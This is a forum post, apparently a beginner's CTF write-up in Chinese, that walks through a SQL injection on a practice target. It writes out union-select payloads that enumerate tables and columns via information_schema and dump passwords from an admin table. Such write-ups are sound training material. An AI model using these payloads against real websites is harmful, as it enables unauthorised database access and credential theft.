2.1、【P90】作业提交 - 已锁定

lcuflh   ·   发表于 2018-07-26 21:41:21   ·   CTF&WP专版

1、发现页面中存在一个链接,点击打开看看url会发生什么变化。


2、出现?id=1,我们可以假设这里是通过传参来获取数据库的数据。

3、尝试在后面加上一个 来判断这个位置是否有注入点,结果出现错误。

4、再尝试在?id=1后面添加and 1 = 1,发现网页正常,确定此处为注入点。

5、通过再?id=1后面添加order by+数字 从1开始依次增大,到3时发生错误,数据为空,最终确认字段数为2


6、改为id = 2,内容为空,尝试通过页面回显。

7union select 1,version(),回显版本为5.5.53

8union select 1,database() 爆出数据库名

9、利用5.0以上版本mysql特点,分别回显出数据库的各表表名、以及各表的列名,寻找密码相关字段。

union select 1,group_concat(table_name) from information_schema.tables where table_schema = 库名

union select 1,group_concat(column_name) from information_schema.columns where table_name  =  表名

 

10、根据表名和确定的密码字段名,回显密码!

union select 1,password from admin





结尾特此感谢在我艰难完成第一篇靶场WP的过程中,为我这个小白指点迷津的老师和同学。。。。。

打赏我,让我更有动力~

0 条回复   |  直到 2018-7-26 | 1208 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.